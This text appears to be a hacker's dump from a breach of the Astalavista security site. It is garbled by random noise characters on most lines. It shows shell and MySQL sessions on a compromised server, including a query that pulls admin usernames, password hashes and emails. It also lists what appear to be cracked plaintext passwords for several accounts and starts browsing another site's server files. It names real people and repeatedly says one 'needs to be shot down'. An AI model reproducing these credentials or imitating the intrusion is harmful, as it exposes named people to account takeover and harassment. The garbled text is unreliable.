<channel>
: }3 @+ n5 o' A+ k J' a( H3 [8 P <title>ASTALAVISTA.com - Exploits</title>- {2 p& V: o3 o5 E) u5 I
<link>http://www.astalavista.com/exploits</link>8 }+ R) {& `- Y1 Q; k6 ^
<description>All availably Exploits.</description>
8 q7 C- J3 u2 V& {7 q' [ <language>en-us</language>
' f# i N+ K3 W& ~# y <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
2 x: I) W9 s) }' w: C8 K <docs>http://blogs.law.harvard.edu/tech/rss</docs>
. I( G! E+ b/ K <generator>Astalavista.com</generator>
: G9 `' b& O; u; @ <webMaster>info@astalavista.com</webMaster>’ . $items . ‘; Y; g) E% `/ `3 I: U. k. w
</channel>
) q7 k- c* d( I3 @ Q5 R0 m# y- J6 [</rss>’;
5 l, F/ E% U! d/ E
) i a( r" L( f1 |8 A3 k: Q if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
0 X! a6 T0 n4 r* }5 ~ unlink (FULLPATH . ‘/feed/exploits.xml’);% K. _+ R) F. |5 c/ {8 f
}
9 |8 L$ u5 u& y. `# g
& z, s* e5 }) q- R& P6 Y file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);3 _( J' q- w% g: D: i; n/ F
[snip]4 Z, ]5 i6 G; I* F9 r y( h7 w H: a
$ \6 i( o/ y# E4 A& n1 Z* Tsh-3.2$ cat exploits.sh
: q5 S, K+ ?, A9 U `- q#!/bin/sh
- Z& G8 S+ r4 \1 ^0 n1 r4 _' R0 W2 Y
###########################################################
4 k" L% M, `- k2 R2 o4 J4 U# #4 s3 g- t, I+ J4 x, }2 ^& A
# Title: milw0rm exploits adder #! _2 |1 h! _5 K% ~( w1 {2 r; ]
# Description: Add all milw0rm exploits to the #' J8 w5 F% v' I) M
# Astalavista.com database #
0 ^7 I3 U) Y6 M- z3 B# #3 {& A5 s, z5 Q O
# Company: Astalavista Group #6 `2 o* U; @. Y _
# Author: Paulo M. Santos #; |( x! Y4 W& a/ M
# E-Mail: 链接标记paulo.santos@astalavista.ch #0 f' y' ?/ q j5 E! G
# #
7 v' O/ N( o2 u" Z###########################################################
0 I6 {8 b4 ], J( C; t1 m: G" a8 N" Q, I/ p
# path
+ m: D* i" u/ X4 I( w% F3 Kthis_path=/home/com/public_html/modifications/cronjobs
2 N4 L& V, x* g2 [4 J$ u
+ F4 f: [! [2 z+ x0 u, D# change directory! |. O- |: g b* |) k
cd $this_path
3 L( E6 A4 j4 L6 |7 s1 x$ c5 gcd tmp/% u" X% \4 @2 z; s0 L/ c! S
% k' O: D6 q4 S0 J [4 m2 u
# delete files, r) ^0 |& M) G; F+ L2 b2 E
rm -rf milw0rm.tar.* &% P$ m% {! P( l" n! E8 w
rm -rf milw0rm/ &; z, |! b, j9 m0 i
2 O4 L+ C) x- J+ j1 e/ ?) J
# wget milw0rm paket4 ]8 @. G7 S' X
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
6 P5 T0 n7 R# }' `
5 Q- _% {6 a4 H& N4 O# v0 U! ^* T' P# extract milw0rm paket( [; S1 c/ B7 g5 h# R9 A5 L
tar -xvf milw0rm.tar.bz2$ m! B- S# v, N8 `1 [( d+ n
, |- v) |8 ^1 [( K% d# change owner* z3 g/ R/ N$ c( p: @- E
chown -R com .
: y; a9 ~$ o; \7 h: pchgrp -R com .
7 t$ x) {- {2 _* F( ?1 C5 e+ m/ M" B1 O- |9 B* r4 X4 b8 Z% P
# execute php script. k9 e" W0 [+ s; K4 l' C2 G- ]
cd $this_path: j- S( T: F' r. I7 t7 ?/ ?- E
php -q exploits.php
, o( s6 _7 j) g8 C+ u/ _* }; S. `1 y# s. T6 H
# delete files
6 W# j0 F$ E- q+ @/ [3 lrm -rf tmp/milw0rm.tar.*
z+ c- f# a6 n: S% ?; trm -rf tmp/milw0rm/
e# X9 r |8 ]
* X% u# X) l% E* V8 wsh-3.2$ echo “Paulo M. Santos needs to be shot down.”+ i {8 o3 k) }! E& l( W
Paulo M. Santos needs to be shot down.& g' _2 w1 ?5 ~2 a. p! o. Q) @ i
# y) ^( ^. M) b
mysql -u contrexxuser2 -p* k( o$ ?2 Q/ C1 N) a
Enter password:' o: |4 A2 T" G) O. c
Welcome to the MySQL monitor. Commands end with ; or \g.
) U* T* B; P' P* E1 ^% ?. ^3 jYour MySQL connection id is 261694
6 B' v) i4 L% D9 [" u4 [Server version: 5.0.45-community-log MySQL Community Edition (GPL)2 W$ |; e$ n8 q2 f5 A
4 M. L% ]6 B6 H0 P
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
& Z7 _) V; }4 i
* w2 f# G3 q/ n2 D% W+ tmysql> show databases;# c# x) Q8 [9 f
+——————–+
8 k1 f0 Y& o" k/ a: Z+ ?| Database |/ L2 \3 s# u, P8 z
+——————–+ \1 I! P+ [3 L3 N/ r& W7 T
| information_schema |
7 A1 |3 y0 `. i& m4 s| com_contrexx2 |
3 G9 U9 G/ i: E9 d: E/ c# A6 _| com_contrexx2_live |
) u4 k* p) g8 C& l| test |
( q9 K- u& B/ S. r- c; {+——————–+
1 H. Y" q4 U" L: A, X4 p4 rows in set (0.00 sec)- H7 @1 O# S1 F5 r0 h! K
# d, r1 y2 Q- y6 }: Lmysql> use com_contrexx2_live
O, _3 Z$ v8 l& LDatabase changed0 r" K" D) H" F% {, a
mysql> show tables;& ]& R1 m3 c4 q9 O( e
+————————————————–+
! e3 @8 V+ T, g: d| Tables_in_com_contrexx2_live |2 w0 l% G7 S* N1 k# o
+————————————————–+2 |' j; [* }3 k: G$ y) t; x
| cc_banner_counter |" o% s* c- L' ^* ~1 U; y b
| cc_search_counter |
, z+ d" J7 J* j( ~2 S& P/ m' S| contrexx_access_group_dynamic_ids |: C/ v3 e$ ^( n1 [- S$ T
| contrexx_access_group_static_ids |
- v! G0 p1 h! [' B| contrexx_access_rel_user_group |
! ~: y1 [- w R| contrexx_access_settings |
0 X1 M2 D, `/ M| contrexx_access_user_attribute |
' n: ?* n! I* R0 C: j% Q7 U% b| contrexx_access_user_attribute_name |' T' @+ ]4 T- g
| contrexx_access_user_attribute_value |9 R. b8 C! p$ M6 b8 l5 Y
| contrexx_access_user_core_attribute |% b: g2 C+ x& H/ Y& Y8 f
| contrexx_access_user_groups |
0 v+ k8 }+ W9 \( @, C5 `| contrexx_access_user_mail |
; {. ~3 v* b8 @ x, g: N| contrexx_access_user_profile |
7 W4 v$ V9 _- N2 g9 G: f6 D3 r| contrexx_access_user_title |1 ?" G; z- T0 } B S" E
| contrexx_access_user_validity |
* Q0 O5 H ~/ v% e| contrexx_access_users |
2 l' `/ a2 O1 n: t$ E| contrexx_backend_areas |/ H: c- ]7 [: x% I! p" j2 C5 x
| contrexx_backups |# B& w& `8 I8 c& o& V" Y$ N5 d
| contrexx_content |$ g% J0 z( V7 ?3 z M+ ]- O7 Y
| contrexx_content_history |
' k8 B2 G+ R# `0 F| contrexx_content_logfile |8 }( {3 ]: r; k+ s4 L
| contrexx_content_navigation |9 c; e. ?: N* c& s. h' L
| contrexx_content_navigation_history |& x( b3 X( x, e& o( v
| contrexx_ids |7 y0 Y H( n$ K! B$ L
| contrexx_languages |. r8 g3 ]; Z, R6 F: @% F7 A8 \+ a
| contrexx_lib_country |# {# P2 ?% H# F* P; n
| contrexx_log |/ k$ {2 w a9 ]; r# g; {
| contrexx_module_alias_source |
7 h" y! a* z, Y5 `; S- g+ h9 Y. l| contrexx_module_alias_target |
* ]5 f B5 A9 P- S| contrexx_module_block_blocks |
+ V3 o* s; Q/ W8 d| contrexx_module_block_rel_lang |
2 n, G; ~- H7 i| contrexx_module_block_rel_pages |: D0 [" D% N) i6 O. X W
| contrexx_module_block_settings |
: e2 b5 C6 F' @+ b4 n| contrexx_module_blog_categories |
q- k/ g d" h| contrexx_module_blog_comments |
4 z. P5 s3 f5 p5 y) _. ^| contrexx_module_blog_message_to_category |
" j- x4 ?0 }9 j3 C8 Q9 Q| contrexx_module_blog_messages |
8 `: l6 K% ?) w/ W* }" ?; i1 y| contrexx_module_blog_messages_lang |
! @$ G( m" @* ?2 w4 i2 [5 x5 p/ a| contrexx_module_blog_networks |1 D# W |. ?( L2 }0 R7 h8 Z8 q3 E
| contrexx_module_blog_networks_lang |
/ g& B* W5 I7 b! d( P! C| contrexx_module_blog_settings |
/ q- F( [, c$ f9 Z3 e+ c/ w| contrexx_module_blog_votes |" s. v% b( `9 m& d
| contrexx_module_calendar |
) z4 z' _6 M' K7 J, f# G3 e! j| contrexx_module_calendar_access |
1 P- Q3 X/ u+ K| contrexx_module_calendar_categories |
* U( V1 Q, u& s. h& @| contrexx_module_calendar_form_data |2 _" k3 D4 y1 ?+ B) N( [
| contrexx_module_calendar_form_fields |
, e2 Z7 G8 D$ Z! o' a| contrexx_module_calendar_registrations |
% j$ L6 `: A7 l| contrexx_module_calendar_settings |
3 ]6 D0 N$ a, m2 r$ A; L, b| contrexx_module_calendar_style |
* B2 }) \! C: j1 u% h# l| contrexx_module_contact_form |0 n! u$ G& R% t" L) W* k
| contrexx_module_contact_form_data |4 r5 L* h; w1 |" P' {1 o- h& n
| contrexx_module_contact_form_field |3 @! h1 a5 {& M+ a, X# K \
| contrexx_module_contact_settings |" L4 h; t- e+ n9 l* T
| contrexx_module_data_categories |4 X! k& t/ r$ U+ Y' b' h+ `
| contrexx_module_data_message_to_category |! Y$ S0 ]6 Y5 O* j% _
| contrexx_module_data_messages |
$ i0 n' j/ i0 l' p| contrexx_module_data_messages_lang |
3 I. ^) h3 ^3 f/ J0 P$ Q| contrexx_module_data_placeholders | T1 w6 P0 J B2 X8 Q. \. U" a
| contrexx_module_data_settings |* X/ k P H& _6 `9 x4 h
| contrexx_module_directory_access |
6 r# v3 t2 l! ^2 b3 I8 r% ^ U: B+ w| contrexx_module_directory_categories |
* d8 ?, t5 p5 U9 |. N$ K. ?% `| contrexx_module_directory_dir |
5 J1 S; T5 k7 E| contrexx_module_directory_inputfields |9 W8 \. ^1 k* ~; H8 K
| contrexx_module_directory_levels |9 U+ k% k) {. w' a& u
| contrexx_module_directory_mail |! |$ D$ f: C8 p# Q( h
| contrexx_module_directory_rel_dir_cat |$ H5 i( z6 ]- u; q: j* \: n
| contrexx_module_directory_rel_dir_level |9 E, \% F: C* l& X
| contrexx_module_directory_settings |
6 ?- P- C& v% P| contrexx_module_directory_settings_google |
0 U* Z. `9 k. z5 w: h| contrexx_module_directory_vote |
" Y5 N6 \0 {# ?3 X# L* H! D+ B0 P| contrexx_module_docsys |
( X) r' [/ s0 c$ k+ C, d1 R| contrexx_module_docsys_categories | l% |( s' h( y2 L6 a( ^4 s) J) ^
| contrexx_module_egov_configuration |+ k, e+ a7 i) z" ` [
| contrexx_module_egov_orders |
5 Y4 j+ c& M: E| contrexx_module_egov_product_calendar |* _8 Q/ [* X/ A- d! y# ?
| contrexx_module_egov_product_fields |2 C: |3 h3 n, f# z- N" B( y
| contrexx_module_egov_products |
3 r5 k) W. Q$ Z: ~$ j+ || contrexx_module_egov_settings |& x/ B' T* s8 H+ f# n" X
| contrexx_module_exploits |# q t& l1 l1 J& N
| contrexx_module_exploits_categories |: X7 f5 M2 B( B4 ]
| contrexx_module_feed_category |
$ ^3 k+ R* W9 h) B| contrexx_module_feed_news |5 u' i/ i5 W, b$ S
| contrexx_module_feed_newsml_association |
9 c: O+ J/ c" E( @# u| contrexx_module_feed_newsml_categories |2 O7 ~1 J- ^7 K; B
| contrexx_module_feed_newsml_documents |
@! T3 S2 f: K! I0 }+ Z1 || contrexx_module_feed_newsml_providers | L* K9 ^ \1 t2 w J$ h7 ^
| contrexx_module_forum_access |, Q! B. }: y% m/ {3 i& r
| contrexx_module_forum_categories |
: {$ y4 v. N0 o3 {7 s8 F- a| contrexx_module_forum_categories_lang |
M- k: }# |2 R+ k| contrexx_module_forum_notification |* a, y# k% R }* v
| contrexx_module_forum_postings |: q3 U' Q# A0 H O' s
| contrexx_module_forum_rating |, R0 K- P* T# n r, D, B7 q0 b
| contrexx_module_forum_settings |
6 ]! ~1 n& ^. Q& H7 ^: e& || contrexx_module_forum_statistics |
0 _ j$ j5 D% [1 A! Q| contrexx_module_gallery_categories |) M# V4 K% Z' N( t) O: [
| contrexx_module_gallery_comments |& B; z3 h2 H1 S* B8 o
| contrexx_module_gallery_language |- }+ S; e6 w- H6 \
| contrexx_module_gallery_language_pics |
$ D" p+ l5 t2 y3 ?| contrexx_module_gallery_pictures |9 S* O$ H5 \+ i; K1 u
| contrexx_module_gallery_settings |5 w6 S( n. }/ z
| contrexx_module_gallery_votes |/ m0 h+ N4 Z/ y# H' k9 b' w
| contrexx_module_guestbook |
1 w! n: q& y$ G( K; ~" R| contrexx_module_guestbook_settings |+ C" Y* f4 q6 |3 A
| contrexx_module_livecam |
8 Q' H6 G5 A7 [. ~5 W| contrexx_module_livecam_settings |; `9 n$ } y: i& D8 y3 e, w F
| contrexx_module_market |
! l8 K: r( T7 u. i8 b| contrexx_module_market_access |# s. E; `6 D+ h7 q( K2 @, z% Q
| contrexx_module_market_categories |
- i1 A- z! h, @0 c3 j| contrexx_module_market_mail |
9 o2 p+ g7 V0 i" @2 p| contrexx_module_market_paypal |8 M2 Q" h. Q U2 R: O3 ?, h
| contrexx_module_market_settings |
7 A" P4 E0 w Q$ N, n: D" G| contrexx_module_market_spez_fields |2 I U8 J' d: ~: d6 J
| contrexx_module_mediadir_access |7 \* e, e5 V) ~% S0 {" n1 P
| contrexx_module_mediadir_categories |
/ `, C4 R% b8 N/ t4 n4 g| contrexx_module_mediadir_comments |
) z' ^, A$ J2 W" k+ }+ ^' U+ u| contrexx_module_mediadir_dir |
: ?" g. t9 z7 d* [5 d5 C0 ^7 G& W. |$ }| contrexx_module_mediadir_inputfields |
8 ~9 h( k0 N5 ?) b/ \0 g% Q+ a q, X| contrexx_module_mediadir_levels |
6 A9 b2 {* m& F0 ~5 f9 j7 P| contrexx_module_mediadir_mail |
' k6 d. I5 }* _1 c( j: W| contrexx_module_mediadir_rel_dir_cat |
4 F) q/ p$ D0 G) e) i( S: y9 J| contrexx_module_mediadir_rel_dir_level |
3 D+ V5 G( \8 s: O2 Y/ B| contrexx_module_mediadir_reports |
7 `5 y. V7 w3 U3 I- `| contrexx_module_mediadir_settings |
+ | Z G& F C. ~8 q| contrexx_module_mediadir_settings_google |
k! j" ?1 K, \6 r; ^| contrexx_module_mediadir_vote |* X; a! B0 N7 u; R0 X
| contrexx_module_memberdir_directories |+ \) v$ n" X- g+ z) y
| contrexx_module_memberdir_name |
- q( ~; r+ l- k2 C! _/ @| contrexx_module_memberdir_settings |
6 S# T! N& c% e3 W7 n' I| contrexx_module_memberdir_values |$ R1 d( N9 L# N, V' d: q9 [0 ?, [
| contrexx_module_nettools_allowed_groups |
1 O: i% m: d1 \; w; W3 v| contrexx_module_nettools_settings |
' l. j, g" ~$ g/ L( L1 E% Q( h6 c| contrexx_module_news |5 a6 l: M r# z( T: o- i
| contrexx_module_news_access |( \* i, o: z' t+ k4 `! f7 W
| contrexx_module_news_categories |, W; h [5 T- l7 ^. h
| contrexx_module_news_settings |
' Z5 W# k' P& }% D| contrexx_module_news_teaser_frame |8 y% l3 o& Z) { _
| contrexx_module_news_teaser_frame_templates |: T i$ I0 Z1 l" |2 W$ }) J
| contrexx_module_news_ticker |: T/ s# g4 j) o7 T- \, q
| contrexx_module_newsletter |
1 b6 [+ F5 ^) P1 d* P/ j1 f' g2 T b| contrexx_module_newsletter_attachment |
6 p3 ?, V# k5 y0 e| contrexx_module_newsletter_category |+ x$ @4 F" z0 t4 S* v0 [
| contrexx_module_newsletter_confirm_mail |/ m5 }, X. V. n# E
| contrexx_module_newsletter_rel_cat_news |
) f2 T/ ?+ N! l3 J3 O6 K6 T) u# x| contrexx_module_newsletter_rel_user_cat |
* f! @9 M. b6 K| contrexx_module_newsletter_settings |6 K/ b7 F% a( O2 D E) @$ u1 u) ^3 L
| contrexx_module_newsletter_template |/ }: v- L* B# D6 O5 ^: ~; k+ V
| contrexx_module_newsletter_tmp_sending |
/ `+ u6 z" ~& s$ _6 F| contrexx_module_newsletter_user |) M# ~$ i1 E. H" ~) ?
| contrexx_module_newsletter_user_title |
9 u8 f6 x# n5 o0 }6 y| contrexx_module_onlinetools_defaultports |0 g+ F9 q( T- |2 D4 H, D X3 i
| contrexx_module_onlinetools_defaultports_back |
! C1 w; U0 S) i% N0 @& B| contrexx_module_onlinetools_geolitecity_blocks |
- Z5 m4 d" P( p! D8 l0 T| contrexx_module_onlinetools_geolitecity_country |! d9 n/ x; J" k2 K6 j( Q
| contrexx_module_onlinetools_geolitecity_location |
m6 Y% g/ M5 K8 d9 X. _| contrexx_module_podcast_category |8 ~7 V& n; t/ V# H1 m; J# ~6 J+ g
| contrexx_module_podcast_medium |& Q4 l7 [% w! M. l
| contrexx_module_podcast_rel_category_lang |
$ _7 {6 |4 v3 M| contrexx_module_podcast_rel_medium_category |5 V$ d6 R9 w9 d6 E" K- }
| contrexx_module_podcast_settings |
1 P( \7 {1 f- F' v| contrexx_module_podcast_template |
, x* e# q$ @$ O- B( n2 k/ g1 D| contrexx_module_proxydb |& v+ h: U. \# m q
| contrexx_module_recommend |9 o" k7 j1 B+ O7 t
| contrexx_module_repository |
3 ]8 D9 p: r% ^6 n* M| contrexx_module_securitynews_cats |, S) K9 `4 w! U0 _. r6 ~7 C/ M, M
| contrexx_module_securitynews_feeds |
2 S' J. n* S4 [. T$ T: u; Y| contrexx_module_securitynews_news |
* {# w* B$ |) h) S+ g| contrexx_module_shop_categories |
7 Z) ], P4 }: T, A& v| contrexx_module_shop_config |: n. H7 P, r$ w
| contrexx_module_shop_countries |- Y$ K' I4 R% W# ^+ N; y+ e, a
| contrexx_module_shop_currencies |
/ \. s) X! Z9 Q| contrexx_module_shop_customers |
0 V: Y& m3 a" q8 Z1 ^% [7 M| contrexx_module_shop_importimg |0 A' j% V4 b2 Q" X% T
| contrexx_module_shop_lsv |3 x M& @6 m' d6 ~" {
| contrexx_module_shop_mail |
: @7 |9 V! M! t+ n3 I. ^6 C| contrexx_module_shop_mail_content |
( S p5 n$ }' j, H; L5 C8 T| contrexx_module_shop_manufacturer |
; }4 C1 a W" q6 O ~1 y| contrexx_module_shop_order_items |
" h/ n/ @6 l2 S: p7 R4 M9 v| contrexx_module_shop_order_items_attributes |
}1 {0 m1 k+ D% R5 }6 a" w2 h| contrexx_module_shop_orders |: l9 c2 s, H9 d7 F' B O
| contrexx_module_shop_payment |' b( U4 `* Z, h
| contrexx_module_shop_payment_processors |; Z% U' K/ `6 r
| contrexx_module_shop_pricelists |) x* k4 o. {7 z2 x* M# E! M
| contrexx_module_shop_products |
' w) H: X; y0 b| contrexx_module_shop_products_attributes |! K4 C7 _/ d/ O( b4 |
| contrexx_module_shop_products_attributes_name |
7 a8 v/ ^4 c; Y. [ @| contrexx_module_shop_products_attributes_value |8 H* l3 [' L; \% c! u5 J
| contrexx_module_shop_products_downloads |
9 C' B, ?, O* r. {+ W3 V| contrexx_module_shop_rel_countries |
' g9 m! I) _; a$ _9 d4 b3 r| contrexx_module_shop_rel_payment |
/ F/ ~6 z" J2 N; e+ D| contrexx_module_shop_rel_shipment |% j9 L7 c( U0 T! v6 q: B& B8 N* |
| contrexx_module_shop_shipment_cost |: N, Q! k+ | i1 M) q
| contrexx_module_shop_shipper |" k3 [& c. T/ g2 e9 t% Z
| contrexx_module_shop_vat |+ |' s0 n5 q! x$ d! E" L
| contrexx_module_shop_zones |0 q6 ^9 G! ~& L
| contrexx_module_u2u_address_list |8 E' x) J& o7 \7 ^
| contrexx_module_u2u_message_log |! m1 Z! [4 n& t J( y6 z
| contrexx_module_u2u_sent_messages |
. S0 a% ] R' z| contrexx_module_u2u_settings |
4 O9 J8 M, B% q" y| contrexx_module_u2u_user_log |
. h3 ?( z. O" S- F5 [! g| contrexx_modules |
) r+ a1 e3 h. ?| contrexx_sessions |& j( x- {$ q. i) [- F3 u0 k
| contrexx_settings |
- l1 I6 g3 D0 D6 o* l* j" }# C| contrexx_settings_smtp |
2 ?8 |) v1 V+ A& F2 t: u7 W$ S3 Z| contrexx_skins |
/ B5 O( K( z# \0 I) j/ B" {& u| contrexx_stats_browser |
* U2 N" ?, v4 d3 ~, b| contrexx_stats_colourdepth |
1 d" {/ }) ]( \- \) y1 e| contrexx_stats_config |
+ [( R o& o" c. D8 {* o* q4 @| contrexx_stats_country |
8 F; ~( p! F$ F, }/ W7 B| contrexx_stats_hostname |
1 T, F$ z/ i( N( j6 i3 O/ r2 C| contrexx_stats_javascript |2 s% D ?+ u4 c+ F) I$ F
| contrexx_stats_operatingsystem |1 S a/ F& X* |6 `+ n
| contrexx_stats_referer |8 n8 q5 F2 | e, {
| contrexx_stats_requests |
" H" c- k7 `2 l' i9 i6 Z+ U: b| contrexx_stats_requests_summary |
5 I" `, m" Y/ Y/ C| contrexx_stats_screenresolution |
. I9 v7 f1 J1 W4 C6 ]. l| contrexx_stats_search |/ D+ H! Z+ c( x& {
| contrexx_stats_spiders |
2 ?( i, L5 z$ C$ G1 F/ a; W; m| contrexx_stats_spiders_summary |
: j9 ^: ^3 Q) a5 K/ Q| contrexx_stats_visitors |
( e, w- H0 {+ ]* p0 Y7 I: D+ T% G| contrexx_stats_visitors_summary |5 z; u8 G1 \& ]- c
| contrexx_voting_additionaldata |% D( _, {, S G/ j
| contrexx_voting_email |
3 L+ B4 s1 Y. N+ Y| contrexx_voting_rel_email_system |/ S6 D7 y! t% }$ `; S: p, X( s
| contrexx_voting_results |. V5 y- f1 L$ t! W# D# h
| contrexx_voting_system |
: S% G# A- q! p) b| foo |
5 u# L7 G+ U5 K. T+————————————————–+
' ^8 `0 o. I' ^4 L" d9 Y; L227 rows in set (0.01 sec)
8 g# _" j3 B/ D+ T" D! I! M
5 O. ]! G- x. G2 e5 Z. dmysql> select count(*) as skids from contrexx_access_users;' S7 [/ q# Z) `+ ] }
+——-+! _8 U, M. L/ `' _3 ?5 o
| skids |4 m1 ]# y& N2 |' Z8 [5 s. z0 v
+——-+
$ [' j$ o E: s6 @1 r5 ?| 53699 |! T$ [$ ?! \3 R; Y2 t
+——-+
' ~0 Z. }$ t; w ?! @5 N1 F1 V1 row in set (0.00 sec)) `3 ?4 `) w; w4 M- k; I. ~2 y
% M0 b% m) e9 s; q x
mysql> describe contrexx_access_users;
: `8 j3 T/ E$ w- p& {0 T( J1 ]8 a+——————+——————————————+——+—–+————–+—————-+
B3 a7 ]( |% e* L$ d- Z# h| Field | Type | Null | Key | Default | Extra |, K- ~; }% L* W5 g' X2 {
+——————+——————————————+——+—–+————–+—————-+
4 \: U" r2 f& V( ?/ u| id | int(10) unsigned | NO | PRI | NULL | auto_increment |6 O1 i4 e" Z6 {& N( v' L. U
| is_admin | tinyint(1) unsigned | NO | | 0 | |1 F$ o* m- {, r, E( a
| username | varchar(40) | YES | MUL | NULL | |
! U# Z, `# L! D$ _9 F' V| password | varchar(32) | YES | | NULL | |
* B$ V4 J9 N5 ^. }" ?* ~, C0 h9 F& W| regdate | int(14) unsigned | NO | | 0 | |7 ]3 n( b. Y4 M
| expiration | int(14) unsigned | NO | | 0 | |* M3 W$ z5 A! C4 i
| validity | int(10) unsigned | NO | | 0 | |
0 h' I0 {4 h4 _/ {2 ~4 h( [, F# t| last_auth | int(14) unsigned | NO | | 0 | |( a( ]$ v: g# K6 g
| last_activity | int(14) unsigned | NO | | 0 | |) w+ o: n" D* h% }
| email | varchar(255) | YES | | NULL | |
7 Q% V5 S {% {2 N8 W6 t| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
0 r5 ^0 L0 E' l& s' Q| frontend_lang_id | int(2) unsigned | NO | | 0 | |% P1 ?7 t' |9 ^+ g: V+ i
| backend_lang_id | int(2) unsigned | NO | | 0 | |
4 N5 r. O( f) ^/ a4 {' w| active | tinyint(1) | NO | | 0 | |- w- p H/ x! s4 A
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |; V$ J7 d" s3 D% H" ^
| restore_key | varchar(32) | NO | | | |
: K! a+ W# c- |7 @6 z| restore_key_time | int(14) unsigned | NO | | 0 | |
; {5 r# D/ H8 Y( N| u2u_active | enum(’0′,’1′) | NO | | 1 | |4 o! x0 z* O- G. [
+——————+——————————————+——+—–+————–+—————-+
$ M) @( M g7 g' s' M8 M18 rows in set (0.00 sec)! i& X( z8 ]% f& _
8 l& o) Z1 d, S& X u: L }5 k9 K- @mysql> select username,password,email from contrexx_access_users where is_admin = 1;
- @5 Q3 D* A3 A Y6 d3 R+————+———————————-+—————————–+4 U/ H& q+ B6 _: ?$ b9 i2 j
| username | password | email |
5 C& T/ |6 b. F+————+———————————-+—————————–+
- D3 ?; }: V$ X! R* I6 \. \| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
" b' B! K) C9 a7 _7 F7 r9 x| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |# f/ m. |: |+ a" z$ P. e
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
- z4 F0 C* [' S t4 Z| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
+ l, Z* M, T0 h+————+———————————-+—————————–+- G8 H4 ~) H6 W! T1 c. ]5 ?' e X
4 rows in set (0.04 sec), c3 U$ f, `, B$ M. _" s
) ^2 A6 z' H4 n4 Lmysql> exit;
2 l1 |! A. g6 {7 E% dBye
# _+ h9 D0 M& x7 B1 c! T5 z
& W, @$ C7 T ]: H. L[~] There you go, your “team of security and IT professionals” is a joke.
) j( v5 D& e- c U# E3 X H, z$ O# o! }; H$ Z [4 f) C$ }
+——————————+
/ M% a5 s; H: I# F+ Lsystem:f82BN3+_*
) y2 g6 O8 D" c5 O# b; ]Be1er0ph0r:belerophor4astacom
2 D# `5 r Q' F0 z& zprozac:asta4cms!
/ _, ~. g- n& icommander:mpbdaagf6m
! @$ N0 B& [+ K$ d) b" bsykadul:ak29eral
/ J9 Y3 f v5 t7 e7 Z4 _- y+——————————+
8 u+ k9 S2 _- D3 c
+ X% ^1 F- ~; C4 `) n3 k[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)0 K" a6 {$ H2 ^5 y2 l* r* c
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.' I; P/ T# ]1 B' B; z0 F/ |
+ b" A! Z) g% K) C[~] Lets move to astalavista.net now,' D/ I. k' ]5 X2 O* t7 S
5 H9 ]6 B$ @0 R/ fFrom <链接标记[url]https://www.astalavista.net/[/url]>:
( k, w: M: t. T2 C9 u>> Everyone knows that the best defense is a good offense.3 G. H- t# ?+ U
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
u# W, ]0 ~& y) j0 w, u>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
8 S. u* L# I2 n6 B" X8 ]5 i>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
9 B0 r. D2 l& N8 G
; Z ]) I! K9 l. W6 _" A8 b>> Go ahead, try and hack our server . in a completely legal way!; F: M: y! l4 o( R' `& S: q
>> Learn by doing: We offer our members tricky tasks and challenges on an
; R( n* I$ [7 r>> ongoing basis so you can test your knowledge and abilities. You can also7 q$ P8 I+ y; B4 L
>> demonstrate what you.ve mastered by taking part in regular hacker contests
1 \0 Z$ F( y+ v>> and war games
3 S' w8 { m3 j0 t$ T+ x
% W6 `3 I' T) I4 e) i[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
- Z) R' W x/ ~( A( v( q7 _* J# O% a8 S# Y! M1 f
[-] Tricky task: Find home dir of astalavista.net- y, \3 x* y& b4 y# k$ i
: P2 S' q( H9 A/ Q
sh-3.2$ ls -la ~astanet5 U2 p0 S+ k6 h) j
total 48- A' C" l, F! d. O: j& c9 m. h
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .0 l& V% P1 j x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ h% B l) n* |- F Ldrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
; w0 b+ t: G3 ], y-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
( Y5 W' p U& q3 o, ^2 X0 _-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout5 ~1 d' Z; P, |; f V
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile! l' D9 T1 D, L& I! R, |8 ~+ _9 T
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# r! }5 |- M" w) y5 ~: x
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains( Q9 \" t" L' g1 t: X7 S# W" U
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap! E$ a+ x( T. n4 @" j$ O4 u, j" M( X
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
$ W7 h8 z& b# e/ Y7 a! olrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
8 a7 t) ]1 Z& r) o-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
) W! X6 ?8 N; ~6 ?& u% h3 }6 {9 N! g' [: o
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
a5 |, r4 T: b9 J6 b% Q6 Dsh-3.2$ ls -la+ E) K6 N. D$ W0 G' X$ ]* r0 }' l
total 200
( R2 p- w( T! Gdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
8 r3 M4 G" B8 t2 Kdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
